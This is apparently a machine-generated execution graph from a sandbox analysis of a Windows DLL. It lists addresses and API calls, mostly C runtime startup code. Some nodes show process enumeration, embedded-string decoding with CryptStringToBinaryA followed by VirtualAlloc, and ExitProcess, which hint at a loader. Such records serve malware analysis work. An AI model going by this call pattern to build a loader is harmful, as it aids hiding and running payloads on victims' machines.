                                                                                                        execution_graph 17124 7ffc123daa18 17125 7ffc123daa27 __vcrt_getptd_noexit 17124->17125 17126 7ffc123daa63 17124->17126 17125->17126 17127 7ffc123daa4a RtlAllocateHeap 17125->17127 17131 7ffc123d97ec 17125->17131 17134 7ffc123db420 17126->17134 17127->17125 17129 7ffc123daa61 17127->17129 17137 7ffc123d9828 17131->17137 17143 7ffc123dba4c GetLastError 17134->17143 17136 7ffc123db429 17136->17129 17142 7ffc123dbd28 EnterCriticalSection 17137->17142 17139 7ffc123d9835 17140 7ffc123dbd7c new LeaveCriticalSection 17139->17140 17141 7ffc123d97fa 17140->17141 17141->17125 17144 7ffc123dba8d FlsSetValue 17143->17144 17149 7ffc123dba70 17143->17149 17145 7ffc123dba7d SetLastError 17144->17145 17146 7ffc123dba9f 17144->17146 17145->17136 17160 7ffc123daad0 17146->17160 17149->17144 17149->17145 17151 7ffc123dbacc FlsSetValue 17154 7ffc123dbad8 FlsSetValue 17151->17154 17155 7ffc123dbaea 17151->17155 17152 7ffc123dbabc FlsSetValue 17153 7ffc123dbac5 17152->17153 17167 7ffc123da9dc 17153->17167 17154->17153 17173 7ffc123db640 17155->17173 17165 7ffc123daae1 __vcrt_getptd_noexit 17160->17165 17161 7ffc123dab32 17164 7ffc123db420 _set_errno_from_matherr 10 API calls 17161->17164 17162 7ffc123dab16 RtlAllocateHeap 17163 7ffc123dab30 17162->17163 17162->17165 17163->17151 17163->17152 17164->17163 17165->17161 17165->17162 17166 7ffc123d97ec new 2 API calls 17165->17166 17166->17165 17168 7ffc123daa10 17167->17168 17169 7ffc123da9e1 RtlReleasePrivilege 17167->17169 17168->17145 17169->17168 17170 7ffc123da9fc GetLastError 17169->17170 17171 7ffc123daa09 __free_lconv_mon 17170->17171 17172 7ffc123db420 _set_errno_from_matherr 9 API calls 17171->17172 17172->17168 17178 7ffc123db518 17173->17178 17190 7ffc123dbd28 EnterCriticalSection 17178->17190 17192 18000be34 17195 180005db4 17192->17195 17194 18000bf4c 17196 180005df9 17195->17196 17197 1800060dd Process32FirstW 17196->17197 17198 180005e61 17196->17198 17197->17196 17198->17194 17199 7ffc123d4394 17200 7ffc123d43ba 17199->17200 17201 7ffc123d43f1 17200->17201 17202 7ffc123d43d1 dllmain_raw 17200->17202 17205 7ffc123d43c2 17200->17205 17201->17205 17250 7ffc123e3fb0 17201->17250 17204 7ffc123d43e4 17202->17204 17202->17205 17216 7ffc123d4194 17204->17216 17208 7ffc123d443e 17208->17205 17210 7ffc123d4194 84 API calls 17208->17210 17209 7ffc123e3fb0 75 API calls 17211 7ffc123d4424 17209->17211 17212 7ffc123d4454 17210->17212 17213 7ffc123d4194 84 API calls 17211->17213 17212->17205 17214 7ffc123d445e dllmain_raw 17212->17214 17215 7ffc123d4431 dllmain_raw 17213->17215 17214->17205 17215->17208 17217 7ffc123d419c 17216->17217 17223 7ffc123d41d5 __scrt_acquire_startup_lock 17216->17223 17218 7ffc123d41c9 17217->17218 17219 7ffc123d41a1 17217->17219 17284 7ffc123d3f18 17218->17284 17220 7ffc123d41a6 17219->17220 17221 7ffc123d41bc __scrt_dllmain_crt_thread_attach 17219->17221 17225 7ffc123d41ab 17220->17225 17299 7ffc123d3e58 17220->17299 17222 7ffc123d41ba 17221->17222 17222->17201 17227 7ffc123d4359 17223->17227 17228 7ffc123d4944 __scrt_fastfail 7 API calls 17223->17228 17239 7ffc123d432e 17223->17239 17225->17201 17311 7ffc123d3ed4 17227->17311 17228->17227 17230 7ffc123d435e 17316 7ffc123d3f04 17230->17316 17231 7ffc123d4206 __scrt_acquire_startup_lock 17233 7ffc123d4232 17231->17233 17246 7ffc123d420a __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 17231->17246 17304 7ffc123d4944 IsProcessorFeaturePresent 17231->17304 17292 7ffc123d3e18 17233->17292 17236 7ffc123d4369 __scrt_release_startup_lock 17320 7ffc123d40f0 17236->17320 17237 7ffc123d4241 _RTC_Initialize 17237->17246 17295 7ffc123d416c 17237->17295 17239->17201 17243 7ffc123d425b 17244 7ffc123d416c shared_ptr 50 API calls 17243->17244 17245 7ffc123d4267 __scrt_initialize_default_local_stdio_options 17244->17245 17247 7ffc123da908 17 API calls 17245->17247 17246->17201 17248 7ffc123d427f 17247->17248 17248->17246 17249 7ffc123d4283 __scrt_dllmain_after_initialize_c 17248->17249 17249->17246 17252 7ffc123e3fee __std_exception_copy __scrt_fastfail 17250->17252 17276 7ffc123e3fe9 17250->17276 17507 7ffc123e9970 17252->17507 17255 7ffc123e91fd 17256 7ffc123e9970 49 API calls 17255->17256 17257 7ffc123e9217 std::_Container_base12::~_Container_base12 17256->17257 17630 7ffc123e9410 17257->17630 17261 7ffc123e9268 17262 7ffc123d1540 47 API calls 17261->17262 17263 7ffc123e9275 17262->17263 17264 7ffc123e9382 __scrt_fastfail 17263->17264 17265 7ffc123e9282 17263->17265 17638 7ffc123e9510 17264->17638 17646 7ffc123e9f00 17265->17646 17269 7ffc123e92bb LoadStringW LoadStringW 17651 7ffc123e3ed0 LoadCursorW RegisterClassExW 17269->17651 17270 7ffc123e929f MessageBoxA 17270->17276 17273 7ffc123e9510 48 API calls 17273->17276 17274 7ffc123e9308 17652 7ffc123e3cb0 CreateWindowExW 17274->17652 17662 7ffc123d3a70 17276->17662 17278 7ffc123e9320 CoUninitialize 17278->17276 17279 7ffc123e932d GetMessageW 17280 7ffc123e9344 TranslateAcceleratorW 17279->17280 17281 7ffc123e9372 CoUninitialize 17279->17281 17282 7ffc123e935a TranslateMessage DispatchMessageW 17280->17282 17283 7ffc123e9370 17280->17283 17281->17276 17282->17283 17283->17279 17285 7ffc123d3f3a __isa_available_init 17284->17285 17324 7ffc123d6ac0 17285->17324 17288 7ffc123d3f43 17288->17231 17411 7ffc123d3f64 17292->17411 17294 7ffc123d3e23 17294->17237 17416 7ffc123d411c 17295->17416 17297 7ffc123d4175 17298 7ffc123d4b40 InitializeSListHead 17297->17298 17431 7ffc123da86c 17299->17431 17305 7ffc123d4969 __scrt_fastfail 17304->17305 17306 7ffc123d4985 RtlCaptureContext RtlLookupFunctionEntry 17305->17306 17307 7ffc123d49ea __scrt_fastfail 17306->17307 17308 7ffc123d49ae RtlVirtualUnwind 17306->17308 17309 7ffc123d4a1c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17307->17309 17308->17307 17310 7ffc123d4a6e 17309->17310 17310->17233 17312 7ffc123d3edd __scrt_release_startup_lock 17311->17312 17315 7ffc123d3ef1 17312->17315 17499 7ffc123da334 17312->17499 17315->17230 17317 7ffc123d3f0f 17316->17317 17318 7ffc123d70b0 __vcrt_uninitialize_ptd 6 API calls 17317->17318 17319 7ffc123d6b45 17318->17319 17319->17236 17321 7ffc123d4101 __scrt_uninitialize_crt 17320->17321 17322 7ffc123d4113 17321->17322 17323 7ffc123d6b1c __vcrt_uninitialize 8 API calls 17321->17323 17322->17239 17323->17322 17325 7ffc123d6ac9 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 17324->17325 17344 7ffc123d7974 17325->17344 17328 7ffc123d3f3f 17328->17288 17332 7ffc123da844 17328->17332 17333 7ffc123de02c 17332->17333 17334 7ffc123d3f4c 17333->17334 17395 7ffc123ddfb0 17333->17395 17334->17288 17336 7ffc123d6b1c 17334->17336 17337 7ffc123d6b24 17336->17337 17338 7ffc123d6b35 17336->17338 17339 7ffc123d70b0 __vcrt_uninitialize_ptd 6 API calls 17337->17339 17338->17288 17340 7ffc123d6b29 17339->17340 17341 7ffc123d79bc __vcrt_uninitialize_locks DeleteCriticalSection 17340->17341 17342 7ffc123d6b2e 17341->17342 17407 7ffc123d7de4 17342->17407 17345 7ffc123d797c 17344->17345 17347 7ffc123d79ad 17345->17347 17348 7ffc123d6ad3 17345->17348 17361 7ffc123d7d20 17345->17361 17349 7ffc123d79bc __vcrt_uninitialize_locks DeleteCriticalSection 17347->17349 17348->17328 17350 7ffc123d7070 17348->17350 17349->17348 17376 7ffc123d7bbc 17350->17376 17352 7ffc123d7080 17353 7ffc123d6ae0 17352->17353 17381 7ffc123d7cb8 17352->17381 17353->17328 17357 7ffc123d79bc 17353->17357 17355 7ffc123d709d 17355->17353 17386 7ffc123d70b0 17355->17386 17358 7ffc123d79e7 17357->17358 17359 7ffc123d79ca DeleteCriticalSection 17358->17359 17360 7ffc123d79eb 17358->17360 17359->17358 17360->17328 17366 7ffc123d79f4 17361->17366 17364 7ffc123d7d77 InitializeCriticalSectionAndSpinCount 17365 7ffc123d7d63 17364->17365 17365->17345 17367 7ffc123d7a5a 17366->17367 17372 7ffc123d7a55 17366->17372 17367->17364 17367->17365 17368 7ffc123d7b22 17368->17367 17370 7ffc123d7b31 GetProcAddress 17368->17370 17369 7ffc123d7a8d LoadLibraryExW 17371 7ffc123d7ab3 GetLastError 17369->17371 17369->17372 17370->17367 17374 7ffc123d7b49 17370->17374 17371->17372 17373 7ffc123d7abe LoadLibraryExW 17371->17373 17372->17367 17372->17368 17372->17369 17375 7ffc123d7b00 FreeLibrary 17372->17375 17373->17372 17374->17367 17375->17372 17377 7ffc123d79f4 try_get_function 5 API calls 17376->17377 17378 7ffc123d7be8 17377->17378 17379 7ffc123d7bff TlsAlloc 17378->17379 17380 7ffc123d7bf0 17378->17380 17379->17380 17380->17352 17382 7ffc123d79f4 try_get_function 5 API calls 17381->17382 17383 7ffc123d7ceb 17382->17383 17384 7ffc123d7d04 TlsSetValue 17383->17384 17385 7ffc123d7cf3 17383->17385 17384->17385 17385->17355 17387 7ffc123d70c4 17386->17387 17388 7ffc123d70bf 17386->17388 17387->17353 17390 7ffc123d7c10 17388->17390 17391 7ffc123d79f4 try_get_function 5 API calls 17390->17391 17392 7ffc123d7c3b 17391->17392 17393 7ffc123d7c51 TlsFree 17392->17393 17394 7ffc123d7c43 17392->17394 17393->17394 17394->17387 17406 7ffc123dbd28 EnterCriticalSection 17395->17406 17397 7ffc123ddfc0 17398 7ffc123e060c 53 API calls 17397->17398 17399 7ffc123ddfc9 17398->17399 17400 7ffc123dddb8 55 API calls 17399->17400 17405 7ffc123ddfd7 17399->17405 17403 7ffc123ddfd2 17400->17403 17401 7ffc123dbd7c new LeaveCriticalSection 17402 7ffc123ddfe3 17401->17402 17402->17333 17404 7ffc123ddea8 GetStdHandle GetFileType 17403->17404 17404->17405 17405->17401 17408 7ffc123d7de8 17407->17408 17410 7ffc123d7e1c 17407->17410 17409 7ffc123d7e02 FreeLibrary 17408->17409 17408->17410 17409->17408 17410->17338 17412 7ffc123d4022 17411->17412 17415 7ffc123d3f7c __scrt_initialize_onexit_tables __scrt_release_startup_lock 17411->17415 17413 7ffc123d4944 __scrt_fastfail 7 API calls 17412->17413 17414 7ffc123d402c 17413->17414 17415->17294 17417 7ffc123d414b 17416->17417 17419 7ffc123d4141 _onexit 17416->17419 17420 7ffc123da6bc 17417->17420 17419->17297 17423 7ffc123da2f8 17420->17423 17430 7ffc123dbd28 EnterCriticalSection 17423->17430 17437 7ffc123db890 17431->17437 17434 7ffc123d6b08 17486 7ffc123d6f4c 17434->17486 17438 7ffc123d3e61 17437->17438 17439 7ffc123db8a1 FlsGetValue 17437->17439 17438->17434 17439->17438 17440 7ffc123db8ae FlsSetValue 17439->17440 17444 7ffc123db730 17440->17444 17445 7ffc123db772 17444->17445 17446 7ffc123db77a 17444->17446 17447 7ffc123da9dc __free_lconv_mon 11 API calls 17445->17447 17448 7ffc123da9dc __free_lconv_mon 11 API calls 17446->17448 17447->17446 17449 7ffc123db787 17448->17449 17450 7ffc123da9dc __free_lconv_mon 11 API calls 17449->17450 17451 7ffc123db794 17450->17451 17452 7ffc123da9dc __free_lconv_mon 11 API calls 17451->17452 17453 7ffc123db7a1 17452->17453 17454 7ffc123da9dc __free_lconv_mon 11 API calls 17453->17454 17455 7ffc123db7ae 17454->17455 17456 7ffc123da9dc __free_lconv_mon 11 API calls 17455->17456 17457 7ffc123db7bb 17456->17457 17458 7ffc123da9dc __free_lconv_mon 11 API calls 17457->17458 17459 7ffc123db7c8 17458->17459 17460 7ffc123da9dc __free_lconv_mon 11 API calls 17459->17460 17461 7ffc123db7d5 17460->17461 17462 7ffc123da9dc __free_lconv_mon 11 API calls 17461->17462 17463 7ffc123db7e5 17462->17463 17464 7ffc123da9dc __free_lconv_mon 11 API calls 17463->17464 17465 7ffc123db7f5 17464->17465 17470 7ffc123db5e0 17465->17470 17484 7ffc123dbd28 EnterCriticalSection 17470->17484 17487 7ffc123d6f60 17486->17487 17488 7ffc123d3e66 17486->17488 17491 7ffc123d6f6a 17487->17491 17494 7ffc123d7c64 17487->17494 17488->17222 17490 7ffc123d7cb8 __vcrt_FlsSetValue 6 API calls 17492 7ffc123d6f7a 17490->17492 17491->17490 17492->17488 17493 7ffc123da9dc __free_lconv_mon 11 API calls 17492->17493 17493->17488 17495 7ffc123d79f4 try_get_function 5 API calls 17494->17495 17496 7ffc123d7c8f 17495->17496 17497 7ffc123d7ca5 TlsGetValue 17496->17497 17498 7ffc123d7c97 17496->17498 17497->17498 17498->17491 17506 7ffc123dbd28 EnterCriticalSection 17499->17506 17671 7ffc123d1710 17507->17671 17514 7ffc123d1540 47 API calls 17515 7ffc123e99f7 17514->17515 17516 7ffc123d2970 49 API calls 17515->17516 17517 7ffc123e9a13 17516->17517 17518 7ffc123d1580 49 API calls 17517->17518 17519 7ffc123e9a2a 17518->17519 17520 7ffc123d1540 47 API calls 17519->17520 17521 7ffc123e9a37 17520->17521 17522 7ffc123d2970 49 API calls 17521->17522 17523 7ffc123e9a53 17522->17523 17524 7ffc123d1580 49 API calls 17523->17524 17525 7ffc123e9a6a 17524->17525 17526 7ffc123d1540 47 API calls 17525->17526 17527 7ffc123e9a77 17526->17527 17528 7ffc123d2970 49 API calls 17527->17528 17529 7ffc123e9a93 17528->17529 17530 7ffc123d1580 49 API calls 17529->17530 17531 7ffc123e9aaa 17530->17531 17532 7ffc123d1540 47 API calls 17531->17532 17533 7ffc123e9ab7 17532->17533 17534 7ffc123d2970 49 API calls 17533->17534 17535 7ffc123e9ad3 17534->17535 17536 7ffc123d1580 49 API calls 17535->17536 17537 7ffc123e9aea 17536->17537 17538 7ffc123d1540 47 API calls 17537->17538 17539 7ffc123e9af7 17538->17539 17540 7ffc123d2970 49 API calls 17539->17540 17541 7ffc123e9b13 17540->17541 17542 7ffc123d1580 49 API calls 17541->17542 17543 7ffc123e9b2a 17542->17543 17544 7ffc123d1540 47 API calls 17543->17544 17545 7ffc123e9b37 17544->17545 17546 7ffc123d2970 49 API calls 17545->17546 17547 7ffc123e9b53 17546->17547 17548 7ffc123d1580 49 API calls 17547->17548 17549 7ffc123e9b6a 17548->17549 17550 7ffc123d1540 47 API calls 17549->17550 17551 7ffc123e9b77 17550->17551 17552 7ffc123d2970 49 API calls 17551->17552 17553 7ffc123e9b93 17552->17553 17554 7ffc123d1580 49 API calls 17553->17554 17555 7ffc123e9baa 17554->17555 17556 7ffc123d1540 47 API calls 17555->17556 17557 7ffc123e9bb7 17556->17557 17558 7ffc123d2970 49 API calls 17557->17558 17559 7ffc123e9bd3 17558->17559 17560 7ffc123d1580 49 API calls 17559->17560 17561 7ffc123e9bea 17560->17561 17562 7ffc123d1540 47 API calls 17561->17562 17563 7ffc123e9bf7 17562->17563 17564 7ffc123d2970 49 API calls 17563->17564 17565 7ffc123e9c13 17564->17565 17566 7ffc123d1580 49 API calls 17565->17566 17567 7ffc123e9c2a 17566->17567 17568 7ffc123d1540 47 API calls 17567->17568 17569 7ffc123e9c37 17568->17569 17570 7ffc123d2970 49 API calls 17569->17570 17571 7ffc123e9c53 17570->17571 17572 7ffc123d1580 49 API calls 17571->17572 17573 7ffc123e9c6a 17572->17573 17574 7ffc123d1540 47 API calls 17573->17574 17575 7ffc123e9c77 17574->17575 17576 7ffc123d2970 49 API calls 17575->17576 17577 7ffc123e9c93 17576->17577 17578 7ffc123d1580 49 API calls 17577->17578 17579 7ffc123e9cb0 17578->17579 17580 7ffc123d1540 47 API calls 17579->17580 17581 7ffc123e9cbd 17580->17581 17582 7ffc123d2970 49 API calls 17581->17582 17583 7ffc123e9cd9 17582->17583 17584 7ffc123d1580 49 API calls 17583->17584 17585 7ffc123e9cf6 17584->17585 17586 7ffc123d1540 47 API calls 17585->17586 17587 7ffc123e9d03 17586->17587 17588 7ffc123d2970 49 API calls 17587->17588 17589 7ffc123e9d1f 17588->17589 17590 7ffc123d1580 49 API calls 17589->17590 17591 7ffc123e9d3c 17590->17591 17592 7ffc123d1540 47 API calls 17591->17592 17593 7ffc123e9d49 17592->17593 17594 7ffc123d2970 49 API calls 17593->17594 17595 7ffc123e9d65 17594->17595 17596 7ffc123d1580 49 API calls 17595->17596 17597 7ffc123e9d82 17596->17597 17598 7ffc123d1540 47 API calls 17597->17598 17599 7ffc123e9d8f 17598->17599 17600 7ffc123d2970 49 API calls 17599->17600 17601 7ffc123e9dab 17600->17601 17602 7ffc123d1580 49 API calls 17601->17602 17603 7ffc123e9dc8 17602->17603 17604 7ffc123d1540 47 API calls 17603->17604 17605 7ffc123e9dd5 17604->17605 17606 7ffc123d2970 49 API calls 17605->17606 17607 7ffc123e9df1 17606->17607 17608 7ffc123d1580 49 API calls 17607->17608 17609 7ffc123e9e0e 17608->17609 17610 7ffc123d1540 47 API calls 17609->17610 17611 7ffc123e9e1b 17610->17611 17612 7ffc123d2970 49 API calls 17611->17612 17613 7ffc123e9e37 17612->17613 17614 7ffc123d1580 49 API calls 17613->17614 17615 7ffc123e9e54 17614->17615 17616 7ffc123d1540 47 API calls 17615->17616 17617 7ffc123e9e61 17616->17617 17618 7ffc123d2970 49 API calls 17617->17618 17619 7ffc123e9e7d 17618->17619 17620 7ffc123d1580 49 API calls 17619->17620 17621 7ffc123e9e9a 17620->17621 17622 7ffc123d1540 47 API calls 17621->17622 17623 7ffc123e9ea7 17622->17623 17701 7ffc123d16a0 17623->17701 17626 7ffc123d1540 47 API calls 17627 7ffc123e9ed4 17626->17627 17628 7ffc123d3a70 _UnwindNestedFrames 8 API calls 17627->17628 17629 7ffc123e9eec 17628->17629 17629->17255 17631 7ffc123e9437 CryptStringToBinaryA 17630->17631 17634 7ffc123e9239 17630->17634 17632 7ffc123e9476 __std_exception_copy 17631->17632 17631->17634 17633 7ffc123e94b9 CryptStringToBinaryA 17632->17633 17632->17634 17633->17634 17635 7ffc123d1540 17634->17635 17636 7ffc123d1910 type_info::_name_internal_method 47 API calls 17635->17636 17637 7ffc123d1561 Concurrency::details::WorkQueue::IsStructuredEmpty 17636->17637 17637->17261 17945 7ffc123d91b8 17638->17945 17641 7ffc123d91b8 47 API calls 17642 7ffc123e954e 17641->17642 17643 7ffc123d91b8 47 API calls 17642->17643 17644 7ffc123e955e VirtualAlloc 17643->17644 17645 7ffc123e93bd 17644->17645 17645->17273 17974 7ffc123e9f40 17646->17974 17648 7ffc123e9f11 17649 7ffc123e9f24 ExitProcess 17648->17649 17650 7ffc123e928c CoInitialize 17648->17650 17650->17269 17650->17270 17651->17274 17653 7ffc123e3d53 RegisterTouchWindow 17652->17653 17660 7ffc123e3d4c 17652->17660 17654 7ffc123e3d64 MessageBoxW 17653->17654 17655 7ffc123e3d87 17653->17655 17654->17660 17656 7ffc123e3d93 CoCreateInstance 17655->17656 17657 7ffc123e3dc6 17656->17657 17656->17660 17998 7ffc123d3d6c 17657->17998 17659 7ffc123e3dd0 17659->17660 17661 7ffc123e3e9b ShowWindow UpdateWindow 17659->17661 17660->17278 17660->17279 17661->17660 17663 7ffc123d3a7a 17662->17663 17664 7ffc123d3a86 17663->17664 17665 7ffc123d3b04 IsProcessorFeaturePresent 17663->17665 17664->17208 17664->17209 17666 7ffc123d3b1b 17665->17666 18012 7ffc123d3cf8 RtlCaptureContext 17666->18012 17672 7ffc123d1731 17671->17672 17707 7ffc123d1910 17672->17707 17674 7ffc123d1741 17711 7ffc123d1b10 17674->17711 17677 7ffc123d2970 17873 7ffc123d1760 17677->17873 17679 7ffc123d29ad char_traits 17877 7ffc123d2cc0 17679->17877 17681 7ffc123d29e2 17881 7ffc123d2e90 17681->17881 17686 7ffc123d16a0 47 API calls 17687 7ffc123d2a12 17686->17687 17688 7ffc123d1540 47 API calls 17687->17688 17689 7ffc123d2a27 17688->17689 17690 7ffc123d3a70 _UnwindNestedFrames 8 API calls 17689->17690 17691 7ffc123d2a39 17690->17691 17692 7ffc123d1580 17691->17692 17693 7ffc123d15a7 17692->17693 17694 7ffc123d1677 17692->17694 17695 7ffc123d1910 type_info::_name_internal_method 47 API calls 17693->17695 17694->17514 17696 7ffc123d15b6 Concurrency::details::WorkQueue::IsStructuredEmpty Concurrency::details::HardwareAffinity::operator!= 17695->17696 17697 7ffc123d167a 17696->17697 17699 7ffc123d163d 17696->17699 17914 7ffc123d1f00 17697->17914 17910 7ffc123d2a90 17699->17910 17702 7ffc123d16c1 Concurrency::details::WorkQueue::IsStructuredEmpty shared_ptr 17701->17702 17703 7ffc123d1910 type_info::_name_internal_method 47 API calls 17702->17703 17704 7ffc123d16e8 17703->17704 17705 7ffc123d1f00 47 API calls 17704->17705 17706 7ffc123d1701 17705->17706 17706->17626 17708 7ffc123d1930 Concurrency::details::WorkQueue::IsStructuredEmpty Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17707->17708 17709 7ffc123d192b type_info::_name_internal_method 17707->17709 17708->17709 17715 7ffc123d2100 17708->17715 17709->17674 17712 7ffc123d1b28 char_traits 17711->17712 17783 7ffc123d1b40 17712->17783 17714 7ffc123d1750 17714->17677 17718 7ffc123d2880 17715->17718 17721 7ffc123d13a0 17718->17721 17720 7ffc123d2127 17720->17709 17722 7ffc123d13c8 17721->17722 17723 7ffc123d13cd 17721->17723 17733 7ffc123d9764 17722->17733 17725 7ffc123d146b 17723->17725 17726 7ffc123d1409 17723->17726 17727 7ffc123d9764 _invalid_parameter_noinfo_noreturn 47 API calls 17723->17727 17725->17720 17728 7ffc123d1435 17726->17728 17729 7ffc123d9764 _invalid_parameter_noinfo_noreturn 47 API calls 17726->17729 17727->17726 17730 7ffc123d1450 17728->17730 17731 7ffc123d9764 _invalid_parameter_noinfo_noreturn 47 API calls 17728->17731 17729->17728 17730->17725 17732 7ffc123d9764 _invalid_parameter_noinfo_noreturn 47 API calls 17730->17732 17731->17730 17732->17725 17738 7ffc123d95d8 17733->17738 17739 7ffc123d9603 17738->17739 17750 7ffc123d9674 17739->17750 17741 7ffc123d962a 17744 7ffc123d964d 17741->17744 17760 7ffc123d90d0 17741->17760 17743 7ffc123d9662 17746 7ffc123d9794 IsProcessorFeaturePresent 17743->17746 17744->17743 17745 7ffc123d90d0 _invalid_parameter_noinfo_noreturn 47 API calls 17744->17745 17745->17743 17747 7ffc123d97a7 17746->17747 17775 7ffc123d9474 17747->17775 17751 7ffc123d93bc _invalid_parameter_noinfo_noreturn 18 API calls 17750->17751 17752 7ffc123d969e 17751->17752 17753 7ffc123d9428 _invalid_parameter_noinfo_noreturn GetLastError SetLastError 17752->17753 17754 7ffc123d96af 17752->17754 17755 7ffc123d96fb 17753->17755 17754->17741 17755->17754 17756 7ffc123d9794 _invalid_parameter_noinfo_noreturn 17 API calls 17755->17756 17757 7ffc123d9742 17756->17757 17758 7ffc123d95d8 _invalid_parameter_noinfo_noreturn 47 API calls 17757->17758 17759 7ffc123d975d 17758->17759 17759->17741 17761 7ffc123d9128 17760->17761 17762 7ffc123d90df GetLastError 17760->17762 17761->17744 17763 7ffc123d90f4 17762->17763 17764 7ffc123dbb14 _invalid_parameter_noinfo_noreturn 16 API calls 17763->17764 17765 7ffc123d910e SetLastError 17764->17765 17765->17761 17766 7ffc123d9131 17765->17766 17767 7ffc123daa78 __FrameUnwindToState 45 API calls 17766->17767 17768 7ffc123d9136 17767->17768 17769 7ffc123d90d0 _invalid_parameter_noinfo_noreturn 45 API calls 17768->17769 17770 7ffc123d9157 17769->17770 17771 7ffc123db474 _invalid_parameter_noinfo_noreturn 45 API calls 17770->17771 17772 7ffc123d917f 17771->17772 17773 7ffc123db4e0 _invalid_parameter_noinfo_noreturn 45 API calls 17772->17773 17774 7ffc123d918f 17773->17774 17774->17744 17776 7ffc123d94ae __scrt_fastfail _invalid_parameter_noinfo_noreturn 17775->17776 17777 7ffc123d94d6 RtlCaptureContext RtlLookupFunctionEntry 17776->17777 17778 7ffc123d9546 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17777->17778 17779 7ffc123d9510 RtlVirtualUnwind 17777->17779 17780 7ffc123d9598 _invalid_parameter_noinfo_noreturn 17778->17780 17779->17778 17781 7ffc123d3a70 _UnwindNestedFrames 8 API calls 17780->17781 17782 7ffc123d95b7 GetCurrentProcess TerminateProcess 17781->17782 17784 7ffc123d1b62 type_info::_name_internal_method 17783->17784 17785 7ffc123d1b69 Concurrency::details::ContextBase::GetWorkQueueIdentity 17784->17785 17786 7ffc123d1b97 17784->17786 17799 7ffc123d1bf0 17785->17799 17790 7ffc123d22b0 17786->17790 17789 7ffc123d1b95 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17789->17714 17791 7ffc123d22cd type_info::_name_internal_method 17790->17791 17793 7ffc123d22de type_info::_name_internal_method 17791->17793 17815 7ffc123d2230 17791->17815 17794 7ffc123d22f2 type_info::_name_internal_method 17793->17794 17797 7ffc123d2310 type_info::_name_internal_method 17793->17797 17809 7ffc123d2600 17794->17809 17796 7ffc123d230e type_info::_name_internal_method 17796->17789 17797->17796 17798 7ffc123d1910 type_info::_name_internal_method 47 API calls 17797->17798 17798->17796 17852 7ffc123d21f0 17799->17852 17801 7ffc123d1c17 type_info::_name_internal_method 17802 7ffc123d1c6c 17801->17802 17803 7ffc123d1c3c 17801->17803 17805 7ffc123d22b0 type_info::_name_internal_method 49 API calls 17802->17805 17856 7ffc123d2520 17803->17856 17808 7ffc123d1c6a Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17805->17808 17806 7ffc123d1c59 17859 7ffc123d2450 17806->17859 17808->17789 17812 7ffc123d2640 Concurrency::details::WorkQueue::IsStructuredEmpty type_info::_name_internal_method 17809->17812 17811 7ffc123d1910 type_info::_name_internal_method 47 API calls 17814 7ffc123d27c2 Concurrency::details::WorkQueue::IsStructuredEmpty construct type_info::_name_internal_method 17811->17814 17818 7ffc123d28e0 17812->17818 17813 7ffc123d2760 Concurrency::details::ContextBase::GetWorkQueueIdentity char_traits 17813->17811 17814->17796 17835 7ffc123d4e9c 17815->17835 17821 7ffc123d2930 17818->17821 17824 7ffc123d12b0 17821->17824 17825 7ffc123d12de 17824->17825 17834 7ffc123d12d4 17824->17834 17826 7ffc123d4e7c Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 17825->17826 17827 7ffc123d12f8 17825->17827 17826->17827 17828 7ffc123d137c 17827->17828 17830 7ffc123d131c 17827->17830 17829 7ffc123d3d6c new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 17828->17829 17829->17834 17831 7ffc123d133b 17830->17831 17832 7ffc123d4e7c Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 17830->17832 17833 7ffc123d3d6c new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 17831->17833 17832->17831 17833->17834 17834->17813 17840 7ffc123d4c70 17835->17840 17839 7ffc123d4ebe 17848 7ffc123d6d48 17840->17848 17842 7ffc123d4ca7 17843 7ffc123d6e00 17842->17843 17844 7ffc123d6e4c 17843->17844 17845 7ffc123d6e6e RtlPcToFileHeader 17843->17845 17844->17845 17846 7ffc123d6e93 17845->17846 17847 7ffc123d6eae RaiseException 17845->17847 17846->17847 17847->17839 17849 7ffc123d6d9e __std_exception_copy 17848->17849 17850 7ffc123d6d69 __std_exception_copy 17848->17850 17849->17842 17850->17849 17851 7ffc123da97c __std_exception_copy 47 API calls 17850->17851 17851->17849 17853 7ffc123d2208 type_info::_name_internal_method 17852->17853 17854 7ffc123d221c 17853->17854 17862 7ffc123d25e0 17853->17862 17854->17801 17857 7ffc123d21f0 type_info::_name_internal_method 49 API calls 17856->17857 17858 7ffc123d253d type_info::_name_internal_method 17857->17858 17858->17806 17860 7ffc123d21f0 type_info::_name_internal_method 49 API calls 17859->17860 17861 7ffc123d2472 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17860->17861 17861->17808 17865 7ffc123d4ec0 17862->17865 17870 7ffc123d4d3c 17865->17870 17868 7ffc123d6e00 _CxxThrowException 2 API calls 17869 7ffc123d4ee2 17868->17869 17871 7ffc123d6d48 __std_exception_copy 47 API calls 17870->17871 17872 7ffc123d4d73 17871->17872 17872->17868 17874 7ffc123d177c 17873->17874 17875 7ffc123d1910 type_info::_name_internal_method 47 API calls 17874->17875 17876 7ffc123d178c 17875->17876 17876->17679 17878 7ffc123d2cd8 type_info::_name_internal_method 17877->17878 17879 7ffc123d22b0 type_info::_name_internal_method 49 API calls 17878->17879 17880 7ffc123d2d1a type_info::_name_internal_method 17878->17880 17879->17880 17880->17681 17887 7ffc123d1510 17881->17887 17884 7ffc123d2e60 17897 7ffc123d14e0 17884->17897 17890 7ffc123d1df0 17887->17890 17889 7ffc123d1537 17889->17884 17891 7ffc123d21f0 type_info::_name_internal_method 49 API calls 17890->17891 17892 7ffc123d1e17 type_info::_name_internal_method 17891->17892 17893 7ffc123d2230 _Mtx_guard::~_Mtx_guard 49 API calls 17892->17893 17894 7ffc123d1e5b type_info::_name_internal_method 17892->17894 17893->17894 17895 7ffc123d22b0 type_info::_name_internal_method 49 API calls 17894->17895 17896 7ffc123d1e8c Concurrency::details::ContextBase::GetWorkQueueIdentity 